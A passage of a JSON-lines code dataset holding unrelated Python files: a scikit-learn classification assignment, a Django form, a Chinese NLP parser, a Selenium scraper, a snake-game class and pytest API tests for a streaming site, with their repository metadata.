rules to when a user might review\n '''\n X = X.drop(['time'], axis=1)\n '''\n !!!Explanation!!!\n I decided to label encode the 'asin' data column. I believe this may be important to the models classification as\n there may be some sort of pattern between the user and the types of video games they review.\n For example, maybe user John only reviews Halo games, and never Call of Duty games.\n As this data type is a string, I needed some way to encode it. My first thought was one hot encoding but there are \n many different 'asin' attributes, so to one hot encode that we would need to use A LOT of bits. Thus one hot \n encoding seemed inefficient for space, thus label encoding these values seemed to be the next best option, as to the\n model the newly allocated numeric names to the 'asin' data will not change its meaning if patterns are present.\n '''\n le = LabelEncoder()\n X['asin'] = le.fit_transform(X['asin'])\n\n # this is here to convert shape to (n,) to prevent future warnings\n y = y.values.ravel()\n le = LabelEncoder()\n y_encoded = le.fit_transform(y)\n\n '''\n !!!Explanation!!!\n I used a special random forest compared to the others I've been using\n The default estimator size (number of trees in the forest) is 100 according to the scikit learn documentation.\n If I execute my code with that amount of estimators, my computer would run out of memory and the program crashes,\n thus after playing around with the hyper parameter of the random forest, I settled at 5 estimators. Once again, I'm\n sure the ideal number of estimators is more, but due to memory limitations I am using 5 estimators.\n '''\n rf = simple_random_forest_classifier(X, y_encoded, 'Amazon')\n print(rf)\n dt = decision_tree_classifier(X, y_encoded)\n print(dt)\n\n '''\n !!!Results!!!\n The decision tree is returning around a .5 accuracy score. \n The random forest classifier is returning around the same accuracy score on average.\n This specific function takes a long time to run as there is a ton of data to be processed, even with the \n preprocessing.\n\n I think there is room for overfitting here due to the duplicate values in the data set.\n This is an issue because these values may be ending up in both the training and the testing set, leading to a bias\n for that one set. It is difficult to compensate for these duplicates with the data we have, so I believe a solution\n to this may be to collect some more data relating to each specific row, perhaps more information relating to the\n users specific review for each review. These features may include some traits coming from the field of NLP, such as \n semantic and sentiment analysis. Perhaps the model would be able to pick up on some patterns relating to how the \n user writes, while also not being biased towards specific labels due to data duplication.\n '''\n if rf['accuracy'] > dt['accuracy']:\n print('random forest wins!')\n return rf\n else:\n print('decision tree wins!')\n return dt\n\n\ndef train_life_expectancy() -> Dict:\n \"\"\"\n Do the same as the previous task with the result of the life expectancy task of e_experimentation.\n The label column is the column which has north/south. Remember to convert drop columns you think are useless for\n the machine learning (say why you think so) and convert the remaining categorical columns with one_hot_encoding.\n (check the c_regression examples to see example on how to do this one hot encoding)\n Feel free to change your e_experimentation code (changes there will not be considered for grading\n purposes) to optimise the model (e.g. score, parameters, etc).\n \"\"\"\n df = process_life_expectancy_dataset()\n '''\n !!!Explanation!!!\n I dropped the year column as there are many and more Nan values within\n It is not really a value you can simply fix by average the columns that are not empty\n Logically that would not make sense, and I believe by doing that the year column would become misrepresented\n I do not predict this to affect accuracy all that much as year should not have that big of an impact on the \n classification of the country being in the north or south, as this function is doing\n '''\n df = df.drop(['year'], axis=1)\n '''\n !!!Explanation!!!\n The expectancy column also has a lot of Nan values, so I decided to replace those Nans with the average of that \n column. I believe this is appropriate as the life expectancy is probably around the same range for each country in\n this dataset, so taking the average of it is a good measure of the life expectancy for any country.\n Note: This hypothesis may not be great as the range of expectancy is quite large, from my preprocessing it will be \n around 75 years; but given that some countries are developing, as well as the data being from many years ago,\n for now I believe the mean can still give a better representation than nothing! \n '''\n mean = get_column_mean(df, 'expectancy')\n df['expectancy'].fillna(value=mean, inplace=True)\n X = df\n X = X.drop(['latitude'], axis=1)\n y = df['latitude']\n print(X)\n print(y)\n\n '''\n !!! Explanation !!!\n I decided to label encode the country name\n I could not leave them as strings as the model would not be able to read it, and I think one hot encoding the names\n would be very space innificient as there are many different country names, and we would need a lot of bits to \n one hot encode them all!\n '''\n le = generate_label_encoder(X['name'])\n X['name'] = le.fit_transform(X['name'])\n\n rf = simple_random_forest_classifier(X, y)\n dt = decision_tree_classifier(X, y)\n\n '''\n !!!Explanation!!!\n Both the decision tree and the random forest are performing very well, both with ~.99 accuracy scores.\n From the results, both performed much better than any function we have classified before.\n I am inclined to believe that this data set has lead to some overfitting, due to an unbalanced dataset.\n The dataset for example, has the country Afghanistan many times, each attribute being the same as the year has been\n removed and many of the expectancy missing values are set to that columns mean.\n This introduces overfitting because the duplicate data instances may go into both the training and testing set,\n contamination!! This is not good as the model will be tested on things it already knows, giving it 100% on it \n almost automatically... kind of like the model is cheating on a test. Given a completely brand new data set,\n I think the models performance would drop.\n\n Due to this data imbalance, I don't think this dataset is that great to run classification on, even with all of the \n preprocessing. I believe a solution to this would be to of course balance out the data set, by collecting more \n information about other countries that are less represented in the dataset, as well as add dimensions that are not \n so redundant as missing or mean expectancies; perhaps more general features relating to the weather if we are still\n trying to predict if it is in the north or south.\n '''\n if rf['accuracy'] > dt['accuracy']:\n print('random forest wins')\n return rf\n else:\n print('decision tree wins')\n return dt\n\n\ndef your_choice() -> Dict:\n \"\"\"\n Now choose one of the datasets included in the assignment1 (the raw one, before anything done to them)\n and decide for yourself a set of instructions to be done (similar to the e_experimentation tasks).\n Specify your goal (e.g. analyse the reviews of the amazon dataset), say what you did to try to achieve the goal\n and use one (or both) of the models above to help you answer that. Remember that these models are classification\n models, therefore it is useful only for categorical labels.\n We will not grade your result itself, but your decision-making and suppositions given the goal you decided.\n Use this as a small exercise of what you will do in the project.\n \"\"\"\n '''\n !!!My Goal!!!\n I will be using the dataset \"Geography\"\n With this dataset, I want to find out if we can fit a model to predict the World Bank Income Group of a country\n given a some geographical and bank related features\n To find this out, I will preprocess the data in the following ways:\n - Fix any missing data in the columns that are mentioned below\n - Extract and label encode the World Bank groups column into the labels vector \n - Extract and one hot encode World bank region column into the features vector\n - Extract latitude into the features vector\n - Extract longitude into the features vector\n I will train both a Decision Tree and Random Forest to find my goal, and return the model with the greater accuracy\n '''\n df = pd.read_csv(Path('..', '..', 'geography.csv'))\n\n '''\n !!!Explanation!!!\n The only columns with Nans for the target features for this were from the Vatican, \n so I replaced their null values with the values from Italy.\n I know they are technically separate, but until the data set can be filled we will simply consider them the same.\n '''\n df['World bank region'].fillna(value='Europe & Central Asia', inplace=True)\n df['World bank, 4 income groups 2017'].fillna('High Income', inplace=True)\n\n le = generate_label_encoder(df_column=df['World bank, 4 income groups 2017'])\n df = replace_with_label_encoder(df=df, column='World bank, 4 income groups 2017', le=le)\n\n ohe = generate_one_hot_encoder(df_column=df['World bank region'])\n df = replace_with_one_hot_encoder(df=df, column='World bank region', ohe=ohe,\n ohe_column_names=ohe.get_feature_names())\n\n columns = ['Latitude', 'Longitude', 'x0_East Asia & Pacific', 'x0_Europe & Central Asia',\n 'x0_Latin America & Caribbean', 'x0_Middle East & North Africa', 'x0_North America',\n 'x0_South Asia', 'x0_Sub-Saharan Africa']\n X = df[columns]\n y = df['World bank, 4 income groups 2017']\n\n dt = decision_tree_classifier(X=X, y=y)\n #print(dt)\n rf = simple_random_forest_classifier(X=X, y=y)\n #print(rf)\n '''\n !!!My Results!!!\n It seems that once again on average the Decision Tree and Random Forest are yielding similar results.\n Their accuracies are quite low, and range from around 50 to nearly 70 percent accuracy.\n I don't think a lot of overfitting is occurring here, as the datasets are well balanced, and properly split\n into training and testing.\n The data set does have a lack of columns that relate to the economy, wealth, or demographics of the country,\n So I believe that more data may improve the model to fit a mapping between the demographic and wealth data of a\n given country, and its income group (target label).\n Features that could be collected as additional data columns could include things such as average income, employment\n rate, tax information, and more!\n I believe although this model is just a start, it could be beneficial to companies who are figuring out economic\n policies or tax plans. I believe, the ability to use this model while trying to come up with plans to benefit a \n country's economy could be useful, with enough relevant training and data :)\n '''\n if rf['accuracy'] > dt['accuracy']:\n #print('random forest wins')\n return rf\n else:\n #print('decision tree wins')\n return dt\n\n\nif __name__ == \"__main__\":\n assert simple_random_forest_on_iris() is not None\n assert reusing_code_random_forest_on_iris() is not None\n assert random_forest_iris_dataset_again() is not None\n assert train_iris_dataset_again() is not None\n assert train_amazon_video_game_again() is not None\n assert train_life_expectancy() is not None\n assert your_choice() is not None\n","repo_name":"noah-sealy-fdl-2021/VisualAnalyticsProjects","sub_path":"assignment2/a_classification.py","file_name":"a_classification.py","file_ext":"py","file_size_in_byte":24531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41173802718","text":"import random\n\nqus = int(random.randint(1, 20))\n\nfor i in range(4):\n print(\"기회가 {}번 남았습니다. 1-20 사이의 숫자를 맞혀 보세요: \".format(4-i))\n ans = int(input(\"\"))\n if ans == qus:\n print(\"축하합니다. {}번 만에 숫자를 맞히셨습니다.\".format(i+1))\n break\n else:\n if ans > qus:\n print(\"Down\")\n else:\n print(\"Up\")\n if i == 3:\n print(\"아쉽습니다 정답은 {}입니다\".format(qus))","repo_name":"jimin8957/My-python-practicing","sub_path":"random_num_game.py","file_name":"random_num_game.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2568133056","text":"from django import forms\nfrom .models import Comment\n\nRATES = [(1,1),(2,2),(3,3),(4,4),(5,5)]\nLIKED = [(True,'Sí'), (False,'No')]\n\nclass CommentForm(forms.ModelForm):\n content_rate = forms.ChoiceField(\n label = 'Calificación del contenido',\n required=True,\n choices=RATES, \n widget=forms.RadioSelect(\n attrs={\n \"class\":\"flex items-center gap-3\"\n }\n )\n )\n class_rate = forms.ChoiceField(\n label = 'Calificación de las clases',\n required=True,\n choices=RATES, \n widget=forms.RadioSelect(\n attrs={\n \"class\":\"flex items-center gap-3\"\n }\n )\n )\n facilitator_rate = forms.ChoiceField(\n label = 'Calificación del tallerista',\n required=True,\n choices=RATES, \n widget=forms.RadioSelect(\n attrs={\n \"class\":\"flex items-center gap-3\"\n }\n )\n )\n description = forms.CharField(\n label = 'Comentarios (opcional)',\n required=False,\n widget=forms.Textarea(\n attrs={\n \"placeholder\": \"Escribe tu opinión del curso, ayúdanos a mejorar\",\n \"class\": \"block p-2.5 w-full text-sm text-gray-900 bg-gray-50 rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500\"\n }\n )\n )\n liked = forms.ChoiceField(\n label='En general, ¿Te gustó el curso?',\n required=True,\n choices=LIKED,\n widget=forms.RadioSelect(\n attrs={\n \"class\":\"flex items-center gap-3 \"\n }\n )\n )\n\n\n class Meta:\n model = Comment\n fields = ('content_rate','class_rate','facilitator_rate','description','liked')","repo_name":"RaySalgado13/FeedbackCourses","sub_path":"feedback/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2119344376","text":"# -*- coding: utf-8 -*-\r\n# @Author : quincyqiang\r\n# @File : sentence_parser.py\r\n# @Time : 2018/8/28 10:46\r\n\r\nimport os\r\nfrom pyltp import Segmentor,Postagger,Parser,NamedEntityRecognizer,SementicRoleLabeller\r\n\r\n\r\nclass LtpParser:\r\n def __init__(self):\r\n # ltp 模型路径\r\n LTP_DATA_DIR='./ltp_data'\r\n\r\n # 分词模型\r\n self.segmentor=Segmentor()\r\n self.segmentor.load_with_lexicon(os.path.join(LTP_DATA_DIR,'cws.model'),'ltp_data/lexicon.txt')\r\n # self.segmentor.load(os.path.join(LTP_DATA_DIR,'cws.model'))\r\n\r\n # 词性标注模型\r\n self.postagger=Postagger()\r\n self.postagger.load(os.path.join(LTP_DATA_DIR,'pos.model'))\r\n\r\n # 依存句法分析\r\n self.parser=Parser()\r\n self.parser.load(os.path.join(LTP_DATA_DIR,'parser.model'))\r\n\r\n # 命名实体识别\r\n self.recognizer=NamedEntityRecognizer()\r\n self.recognizer.load(os.path.join(LTP_DATA_DIR,'ner.model'))\r\n\r\n # 语义角色标注\r\n self.labeller=SementicRoleLabeller()\r\n self.labeller.load(os.path.join(LTP_DATA_DIR,'pisrl_win.model'))\r\n\r\n def format_label_role(self, words, postags):\r\n \"\"\"\r\n 语义角色标注\r\n :param self:\r\n :param words:\r\n :param postags:\r\n :return:\r\n \"\"\"\r\n arcs = self.parser.parse(words, postags)\r\n roles = self.labeller.label(words,postags,arcs)\r\n roles_dict={}\r\n\r\n for role in roles:\r\n roles_dict[role.index]={arg.name:[arg.name,arg.range.start,arg.range.end] for arg in role.arguments}\r\n return roles_dict\r\n\r\n def build_parse_child_dict(self,words,postags,arcs):\r\n \"\"\"\r\n 句法分析---为句子的每个词语维护一个保存语法依存儿子节点的字典\r\n :param words:\r\n :param postags:\r\n :param arcs:\r\n :return:\r\n \"\"\"\r\n child_dict_list=[]\r\n format_parse_list=[]\r\n\r\n for index in range(len(words)):\r\n child_dict=dict()\r\n for arc_index in range(len(arcs)):\r\n if arcs[arc_index].head==index+1:# arcs的索引从1开始\r\n if arcs[arc_index].relation in child_dict:\r\n child_dict[arcs[arc_index].relation].append(arc_index)\r\n else:\r\n child_dict[arcs[arc_index].relation]=[]\r\n child_dict[arcs[arc_index].relation].append(arc_index)\r\n child_dict_list.append(child_dict)\r\n rely_id=[arc.head for arc in arcs] # 提取依存父节点id\r\n relation=[arc.relation for arc in arcs]\r\n heads=['Root' if id==0 else words[id-1] for id in rely_id]\r\n\r\n for i in range(len(words)):\r\n a=[relation[i],words[i],i,postags[i],heads[i],rely_id[i]-1,postags[rely_id[i]-1]]\r\n format_parse_list.append(a)\r\n return child_dict_list,format_parse_list\r\n\r\n '''parser主函数'''\r\n\r\n def parser_main(self, sentence):\r\n words = list(self.segmentor.segment(sentence))\r\n postags = list(self.postagger.postag(words))\r\n arcs = self.parser.parse(words, postags)\r\n child_dict_list, format_parse_list = self.build_parse_child_dict(words, postags, arcs)\r\n roles_dict = self.format_label_role(words, postags)\r\n return words, postags, child_dict_list, roles_dict, format_parse_list\r\n\r\n\r\nif __name__ == '__main__':\r\n parse=LtpParser()\r\n sentence=\"李克强总理今天来我家了,我感到非常荣幸\"\r\n words, postags, child_dict_list, roles_dict, format_parse_list =parse.parser_main(sentence)\r\n print(words,len(words))\r\n print(postags,len(postags))\r\n print(child_dict_list,len(child_dict_list))\r\n print(roles_dict)\r\n print(format_parse_list,len(format_parse_list))\r\n","repo_name":"yanqiangmiffy/triple_extraction","sub_path":"sentence_parser.py","file_name":"sentence_parser.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"10182804988","text":"import argparse\nimport shutil\nfrom multiprocessing import pool\nfrom pathlib import Path\n\nimport numpy as np\n\nfrom crossing_guide.util import read_image, read_metrics\nfrom preprocess import pieces\n\nSPANS = np.linspace(-np.pi / 2, np.pi / 2, 15)\n\n\ndef process_piece(root, piece_no, start, end, output_dir: Path, mode):\n timestamps = [p.stem for p in root.rglob(\"*.jpg\")\n if int(p.stem) >= start and int(p.stem) <= end]\n index_to_check = 0 if mode == 'landscape' else 1\n\n for ts in timestamps:\n met = read_metrics(next(root.rglob(\"{}.bin\".format(ts))))\n cat_index = np.where(SPANS > met[index_to_check])[0][0]\n image_file = next(root.rglob(\"{}.jpg\".format(ts)))\n\n if not (output_dir / str(cat_index)).exists():\n (output_dir / str(cat_index)).mkdir()\n\n shutil.copy(str(image_file), str(\n output_dir / str(cat_index) / \"{}.jpg\".format(ts)))\n\n print(\"processed: {}\".format(piece_no))\n\n\ndef preprocess(root: Path, output_dir, mode: str):\n my_pool = pool.Pool(8)\n output_dir = Path(output_dir)\n if not output_dir.exists():\n output_dir.mkdir()\n\n for i, (start, end) in enumerate(pieces):\n my_pool.apply_async(\n process_piece, (root, i, start, end, output_dir, mode))\n\n my_pool.close()\n my_pool.join()\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Preprocess Data.')\n parser.add_argument('--root', dest='root',\n required=True, help='root path of data')\n parser.add_argument('--output-dir', dest='output_dir', default='categorized',\n required=False, help='output directory of processed data')\n parser.add_argument('--mode', dest='mode', default='landscape',\n required=False, help='mode of processing: landscape or protrait')\n args = parser.parse_args()\n root = Path(args.root)\n preprocess(root, args.output_dir, args.mode)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tongda/DeepCrossingGuide","sub_path":"preprocess2.py","file_name":"preprocess2.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29335467589","text":"import os\nimport re\nfile1 = open('input.txt', 'r')\nfile2 = open(\"output.txt\", \"w\") \nLines = file1.readlines()\n\nlist_all_words = [] #保留entry的顺序\n# 一个词头允许同时出现于d1 d2\nd1 = {}\nd2 = {}\n# 目前的链接源词头\nk1 = ''\n# 展开过的节点\nlist_done_words = []\n# 树形图仅参考,已完成的树不会再嫁接上另一个树\ntree = ''\nprint_tree = False\n# 写词头与内容,d can be d1 or d2\ndef write_to_d(k,v,d):\n if k not in d:\n d[k] = [v]\n elif v not in d[k]:\n d[k].append(v)\n# 展开一个有链接的词头\ndef dig(k,l=0):\n global tree\n global print_tree\n if l>1:\n print_tree = True\n list_done_words.append(k)\n for item in d2[k]:\n is_in_d1 = False\n if item in list_done_words:\n tree = tree + ' '*4*l+'+---'+item+': ✗'+'\\n'\n continue\n if item in d1:\n is_in_d1 = True\n tree = tree + ' '*4*l+'+---'+item+': ✓'+'\\n'\n for v in d1[item]:\n write_to_d(k1, v, d1)\n if item in d2:\n if not is_in_d1:\n tree = tree + ' '*4*l+'+---'+item+'\\n'\n dig(item,l+1)\n# Split file to d1,d2\ncurrent_word = ''\ncon = ''\nis_head = True\nno_non_link_line = True\nhas_link_line = False\nlinked_word = ''\nword_count = 0\nwarnings = ''\nfor line in Lines:\n # head\n if is_head:\n current_word = line.rstrip(\"\\n\")\n word_count += 1\n if word_count%10000 == 0:\n print('read: '+str(word_count))\n if current_word not in list_all_words:\n list_all_words.append(current_word)\n con = ''\n is_head = False\n no_non_link_line = True\n has_link_line = False\n linked_word = ''\n continue\n # link\n matchObj = re.match('^@@@LINK=(.+)', line)\n if matchObj:\n if has_link_line:\n warnings += 'warning: more than one LINK line in entry: '\n warnings += current_word\n warnings += '\\n'\n linked_word = matchObj.group(1) \n write_to_d(current_word, linked_word, d2)\n has_link_line = True\n continue\n # end of an entry\n matchObj = re.match('^', line)\n if matchObj:\n if has_link_line and not no_non_link_line:\n warnings += 'warning: both LINK line and non-LINK line found in entry: '\n warnings += current_word\n warnings += '\\n'\n if con != '':\n write_to_d(current_word, con, d1)\n is_head = True\n continue\n # content line\n no_non_link_line = False\n con += line\n\n# 处理d2\nd2_processed_count = 0\nwhile bool(d2):\n k1 = list(d2.keys())[0]\n list_done_words=[]\n tree = k1 + '\\n'\n print_tree = False\n dig(k1,0)\n if print_tree:\n print(tree)\n del d2[k1]\n d2_processed_count += 1\n if d2_processed_count%10000 == 0:\n print('processed: '+str(d2_processed_count))\n\n# now d2 is empty, and all entry is in d1, let’s write d1 to a new file\nf2_entrys_count = 0\nfor entry in list_all_words:\n if entry in d1:\n for content in d1[entry]:\n file2.write(entry)\n file2.write('\\n')\n file2.write(content)\n file2.write('\\n')\n f2_entrys_count += 1\n if f2_entrys_count%10000 == 0:\n print('wrote: '+str(f2_entrys_count))\n\nfile2.close()\n\nprint(warnings)\nprint('words:'+str(word_count)+' (in input file)')\nprint('words:'+str(f2_entrys_count)+' (in output file)')\nprint('words:'+str(len(list_all_words))+' (separate entrys, maybe with empty entrys)')\n\n# remove the last empty line\nwith open('output.txt') as f_input:\n data = f_input.read().rstrip('\\n')\nwith open('output.txt', 'w') as f_output: \n f_output.write(data)\n","repo_name":"edr1412/Mdict-Converter","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"41818834836","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 19 21:50:41 2020\n\n@author: Duke Young\n\"\"\"\n\n\nfrom selenium.common.exceptions import NoSuchElementException,StaleElementReferenceException,TimeoutException \nfrom selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nimport json\n\n\n\n#//*[@id=\"content-container\"]/home-page/section/div/games-list/div/gamelist/div/div[2]/sport-league-header/div/div[2]/span\n\n\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"start-maximized\")\n\n#driver = webdriver.Chrome(executable_path='chromedriver.exe',options=options)\n#wait = WebDriverWait(driver,50)\n\ndef edit_leaguename(z,value):\n d = \"\"\n it= 0\n z = z.split()\n \n for i in z:\n if it == 0:\n d = d + i\n elif it == 1:\n d = d + i\n elif it == 2:\n i = i.replace(\",\",\"\")\n d = d + i\n else:\n i = i.replace(\",\",\"\")\n d = d + \"-\" + i\n it = it + 1\n d = value + d\n return d\n \nfinal_list1 = []\n\nleagues = {\"tennis\":\"https://www.eazibet.com.gh/en/tennis/\"}\ndef finding_leagues():\n driver = webdriver.Chrome(executable_path='chromedriver.exe',options=options)\n wait = WebDriverWait(driver,50)\n for l, value in leagues.items():\n driver.get(value)\n length_players = []\n \n Leag = '//*[@id=\"filter-league\"]/div/div/div/select'\n Leag_text = wait.until(EC.presence_of_element_located((By.XPATH,Leag)))\n Leag_text = Leag_text.get_attribute(\"innerText\")\n print(\"Leag_text\")\n Leag_text = Leag_text.split(\"\\n\")\n #print(Leag_text)\n index = Leag_text.index(\"-- All Leagues alphabetically --\")\n \n i = 0\n while i <= index:\n Leag_text.pop(0)\n i = i + 1\n #print(Leag_text)\n#https://www.eazibet.com.gh/en/tennis/tennis-atp-nur-sultan-kazakhstan \n L = [edit_leaguename(elem.lower(),value) for elem in Leag_text]\n#v = edit_leaguename(L)\n #print(L)\n #print(\"\")\n \n for li in L:\n v = li.split(\"-\")\n if v[-3] == \"itf\":\n v.pop(-3)\n final_list1.append(\"-\".join(v))\n players_xpath = '//div[@class = \"game__team last_team\"]'\n players = wait.until(EC.presence_of_all_elements_located((By.XPATH,players_xpath)))\n length_of_players = len(players)\n length_players.append(length_of_players)\n driver.close()\n return final_list1,Leag_text,length_players\n\n\n","repo_name":"Jeffery77/local_arbs","sub_path":"tra.py","file_name":"tra.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41723216179","text":"from turtle import Turtle, Screen\r\nimport random\r\n\r\nSCREEN_WIDTH = 600\r\nSCREEN_HEIGHT = 600\r\nSNAKE_SIZE = 20\r\n\r\nclass Food(Turtle):\r\n def __init__(self):\r\n super().__init__()\r\n self.x_possible_pos = (SCREEN_WIDTH/2 - SNAKE_SIZE)/SNAKE_SIZE\r\n self.y_possible_pos = (SCREEN_HEIGHT/2 - SNAKE_SIZE)/SNAKE_SIZE\r\n self.shape(\"circle\")\r\n self.shapesize(stretch_wid = 0.5, stretch_len = 0.5)\r\n self.penup()\r\n self.color(\"red\")\r\n self.set_position()\r\n\r\n def set_position(self):\r\n self.setposition(x = SNAKE_SIZE * random.randint(-1 * self.x_possible_pos, self.x_possible_pos), y = SNAKE_SIZE * random.randint(-1 * self.y_possible_pos, self.y_possible_pos - 1)) #-1 biar ada space for scoreboard text\r\n\r\n def debug(self):\r\n print(self.pos())\r\n\r\n# screen = Screen()\r\n\r\n# food = Food()\r\n# print(SNAKE_SIZE * random.randint(-1 * food.x_possible_pos, food.x_possible_pos))\r\n# print(SNAKE_SIZE * random.randint(-1 * food.y_possible_pos, food.y_possible_pos))\r\n\r\n# screen.exitonclick()","repo_name":"rizkyarchives/journey","sub_path":"python/snake-game/snakeFood.py","file_name":"snakeFood.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73253220901","text":"import json\nimport os\n\nimport pytest\nimport requests\n\nimport loadData.payloadData as Payload\nimport allure\nimport tests.common as common\n\n\n@allure.feature('test_homepage')\nclass TestHomePage:\n @allure.title('test_homepage_carousels')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_homepage_carousels(self, get_config_data, api_headers): # 轮播检查\n \"\"\"\n 接口: HomePageCarousels\n\n 检查轮播接口\n \"\"\"\n with allure.step('检查轮播接口'):\n response_json = common.api_post(get_config_data['url'], api_headers, Payload.homepage_carousels())\n print(response_json)\n with allure.step('检查轮播的位置是否为5'):\n assert len(response_json['data']['carousels']) == 5\n with allure.step('检查轮播接口的返回值不包含err '):\n assert 'err' not in response_json\n\n @allure.title('test_homepage_livestream')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_homepage_livestream(self, get_config_data, api_headers): # 画廊直播间检查\n \"\"\"\n 接口: HomePageLivestream\n\n 检查首页直播流接口\n \"\"\"\n with allure.step('检查首页直播流接口'):\n response_json = common.api_post(get_config_data['url'], api_headers, Payload.homepage_livestream())\n print(response_json)\n with allure.step('检查轮播接口的返回值不为空 '):\n assert len(response_json['data']['livestreams']['list']) is not None\n with allure.step('检查轮播接口的返回值不包含err '):\n assert 'err' not in response_json\n\n @allure.title('test_homepage_list_recommendation')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_homepage_list_recommendation(self, get_config_data, api_headers): # 推荐系统\n \"\"\"\n 接口: HomePageListRecommendation\n\n 检查主页推荐系统\n \"\"\"\n with allure.step('检查主页推荐系统 '):\n response_json = common.api_post(get_config_data['url'], api_headers, Payload.homepage_list_recommendation())\n print(response_json)\n data = response_json.get('data')\n home_page_list_recommendation = data.get('listRecommendation')\n print(home_page_list_recommendation)\n with allure.step('检查数据不为空'):\n assert home_page_list_recommendation is not None\n with allure.step('检查数据无报错'):\n assert 'err' not in data\n\n @allure.title('test_homepage_global_information_recommend')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_homepage_global_information_recommend(self, get_config_data, api_headers): # 主页左边的推荐列表\n \"\"\"\n 接口:GlobalInformationRecommend\n\n 主页左边的推荐列表\n \"\"\"\n with allure.step(\"主页左边的推荐列表\"):\n response_json = common.api_post(get_config_data['url'], api_headers,\n Payload.homepage_global_information_recommend())\n # 判断 recommendChannels 数组是否为空\n recommend_channels = response_json['data']['globalInfo']['recommendChannels']\n with allure.step('检查数据不为空'):\n assert len(recommend_channels) > 0\n with allure.step('检查数据无报错'):\n assert 'err' not in response_json['data']\n\n @allure.title('test_homepage_nav_search_result')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_homepage_nav_search_result(self, get_config_data, api_headers):\n \"\"\"\n 接口: NavSearchResult\n\n 搜索关键字: automation\n 检查首页搜索功能\n \"\"\"\n with allure.step('检查首页搜索功能'):\n data = common.api_post(get_config_data['url'], api_headers,\n Payload.homepage_nav_search_result(\"automation\"))\n # 解析返回结果\n print(data)\n users = data['data']['search']['allUsers']['list']\n print(users)\n\n with allure.step('检查搜索结果是否包含\"automation\"'):\n found_user = False\n for user in users:\n if user['creator']['displayname'] == 'automation':\n found_user = True\n break\n assert found_user is True\n\n @allure.title('test_homepage_nav_search_category')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_homepage_nav_search_category(self, get_config_data, api_headers):\n response = requests.post(get_config_data['url'], headers=api_headers,\n json=Payload.homepage_nav_search_result(\"qatest\"))\n assert response.status_code == 200\n # 解析返回结果\n data = json.loads(response.text)\n\n # 检查返回的数据中的\"search\"字段是否为字典类型\n assert isinstance(data[\"data\"][\"search\"], dict), \"'search' field is not a dictionary\"\n\n # 检查返回的数据中的\"liveCategories\"字段是否为字典类型\n assert isinstance(data[\"data\"][\"search\"][\"liveCategories\"], dict), \"'liveCategories' field is not a dictionary\"\n\n # 检查返回的数据中的\"liveCategories\"字段中的\"list\"字段是否为列表类型\n assert isinstance(data[\"data\"][\"search\"][\"liveCategories\"][\"list\"], list), \"'list' field is not a list\"\n\n # 获取分类列表\n categories = data[\"data\"][\"search\"][\"liveCategories\"][\"list\"]\n print(categories)\n # 检查是否存在\"title\": \"qaTest\"\n found_category = False\n for category in categories:\n if category.get(\"title\") == \"qaTest\":\n found_category = True\n break\n\n # 检查结果\n assert found_category == True, \"Category 'qaTest' not found\"\n\n @allure.title('test_me_global')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_me_global(self, get_config_data, get_viewer1_login_auth_header):\n \"\"\"\n 接口: MeGlobal\n\n 测试用户: 66@nqmo.com/password\n 检查用���global信息\n \"\"\"\n data = common.api_post(get_config_data['url'], get_viewer1_login_auth_header,\n Payload.me_global())\n print(data)\n with allure.step('检查用户ID是否正确'):\n assert data['data']['me']['id'] == 'user:dlive-degnujtptx', \"User ID is incorrect\"\n\n with allure.step('检查用户名是否正确'):\n assert data['data']['me']['displayname'] == 'automation_viewer1', \"User displayname is incorrect\"\n\n with allure.step('检查用户余额是否为0'):\n assert data['data']['me']['wallet']['balance'] != 0, \"User balance is 0\"\n\n with allure.step('检查用户头像URL是否正确'):\n assert data['data']['me']['avatar'] == 'https://image.dlivecdn.com/avatar/default22.png', \\\n \"Avatar URL is incorrect\"\n\n with allure.step('检查用户角色是否为None'):\n assert data['data']['me']['role'] == 'None', \"User role is not None\"\n\n @allure.title('test_live_streams_languages')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_live_streams_languages(self, get_config_data, api_headers):\n response = requests.post(get_config_data['url'], headers=api_headers,\n json=Payload.live_streams_languages())\n assert response.status_code == 200\n # 解析返回结果\n data = json.loads(response.text)\n print(data)\n\n # 检查返回的数据中的\"languages\"列表是否包含至少一个元素\n assert len(data[\"data\"][\"languages\"]) > 0, \"'languages' list is empty\"\n\n #检查返回的数据中的每个语言对象是否包含\"id\"、\"backendID\"、\"language\"和\"code\"字段\n for language in data[\"data\"][\"languages\"]:\n assert \"id\" in language, \"Language object does not contain 'id' field\"\n assert \"backendID\" in language, \"Language object does not contain 'backendID' field\"\n assert \"language\" in language, \"Language object does not contain 'language' field\"\n assert \"code\" in language, 